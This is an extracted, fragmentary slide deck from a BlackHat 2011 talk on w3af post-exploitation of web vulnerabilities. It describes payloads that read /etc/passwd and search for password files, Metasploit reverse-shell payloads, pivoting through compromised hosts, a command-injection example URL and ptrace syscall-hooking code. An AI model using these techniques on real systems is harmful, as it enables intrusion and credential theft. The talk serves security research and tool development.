Professional Documents
Culture Documents
Andrs Riancho
Director of Web Security
BlackHat 2011 - Barcelona
Topics
Conclusions
2
andres@rapid7.com$ whoami
Director of Web Security @ Rapid7
Founder @ Bonsai Information Security
Developer (python!)
Open Source Evangelist
Deep knowledge in networking , design and IPS evasion.
Project leader for w3af
Introduction to w3af
w3af is an open source Web Application
Attack and Audit Framework
First version released in March 2007
Open Source tool (GPLv2.0) to identify and exploit Web
vulnerabilities
Architecture supports plug-ins (easily extensible)
Available for free download @ www.w3af.org
Code Swarm
GUI demo
This is how it looks
10
12
13
Vuln!
2 hours
3 hours
6 hours
14
15
The reasons
Exploitation frameworks are focused on memory corruption
exploits because they were the most important vulnerability
class.
Attention has now shifted to Web applications, which are
different because they only allows us, depending on the
vulnerability, to interact with the system in a particular way:
16
Read a file
Write a file
Control a section of a SQL query
Execute user controlled source code
Execute operating system commands
17
read()
File upload
write()
[often restricted to specific directory]
18
19
Exported Syscalls
read()
read()
OS Commanding
execute()
DAV Shell
write()
execute() , read(),
unlink()
File Upload
write()
execute() , read(),
unlink()
Emulating syscalls
Syscall emulation is easy in some cases, for example read() is
emulated via the execution of "cat filename" or "type filename",
depending on the OS:
Knowledge
read()
Parse
22
4.
23
Demo users
Baby steps
24
25
Payload that
reads
/etc/passwd
and identifies
home
directories
interesting_files
System call to
read files
users
read()
This payload
uses the home
directories and
a list of
interesting
filenames to
search for
passwords.
Demo interesting_files
Treasure hunt
27
Identified vulnerabilities
Remote Web server type (Apache, IIS, etc.)
Remote operating system
Found URLs
28
Demo get_source_code
w3af integration
30
w000t!
31
33
w3af scan
Identify local
file read
Exploit
read()
SCA
Identify SQLi
Exploit
write()
exec()
SQL Injection
OS Commanding
Arbitrary file read
Remote file inclusion
eval() vulnerabilities
Taint analysis
34
$_GET[]
$_POST[]
$_COOKIE[]
$_REQUEST[]
?>
SCA output:
Tainted variable $bar created as concatenation of 'ls ' and user
controlled variable $_GET['foo']
Tainted variable $bar used as parameter #1 of system() in line 2
Exploit: /filename.php?bar=;ls
36
SCA output:
Tainted variable $foo declared in line 2, taint source is
$_GET['bar']
$foo is now clean for OS Commanding.
37
38
39
41
42
msf_linux_x86_meterpreter_reverse
msf_windows_meterpreter_reverse_tcp
msf_windows_vncinject_reverse
w3af_agent
Metasploit integration
Completely rewritten as a Web application Payload
Metasploit integration is very simple and is achieved
through the following steps:
1.
2.
3.
4.
43
44
w3af agent
The w3af agent allows us to route traffic through the
compromised host without any effort.
1.
2.
3.
45
Demo w3af_agent
Routing traffic through the compromised host
46
Syscall hooking
Syscall hooking using ptrace() is a research in progress, for
which we only have a small PoC, but I wanted to explain it here
to get feedback and new ideas.
The initial idea we had with Lucas Apa (the main Web
application security payload developer) was to create a
framework that would hook into a process and forward it
over the network to the remote server using the Web
application exploit.
Using this method, we would be able to run any software
installed on the host running w3af in the remote box. A simple
example would be clamav.
47
Syscall hooking
open()
emulated
read()
48
Syscall hooking
49
Syscall hooking
# Called before linuxs read() syscall
def callbefore(self, pid, call, args):
m = Memory.getMemory(pid)
arg_mem_addr_path = args[0]
filename = m.get_string( arg_mem_addr_path )
# Calling the read syscall of one of w3afs exploits
local_filename = self.shell.download( filename )
area, area_size = m.areas()[0]
m.poke(area, local_filename + '\0')
# Rewrite the syscall in order to read the local file
return (None, None, None, (area, args[1], args[2]) )
50
Our goal is to make this the standard for automatized postexplotation of Web application vulnerabilities.
51
plugins/attack/payloads/
core/controllers/vdaemon/
core/controllers/w3afAgent/
core/controllers/payloadTransfer/
http://w3af.svn.sourceforge.net/viewvc/w3af/trunk/
52
Andrs Riancho
Director of Web Security
General Manager of Rapid7s Web
Application Center of Excellence in
Buenos Aires
andres_riancho@rapid7.com
Follow me on Twitter @w3af
53
Thank you!
Web Application Center of Excellence,
Buenos Aires, Argentina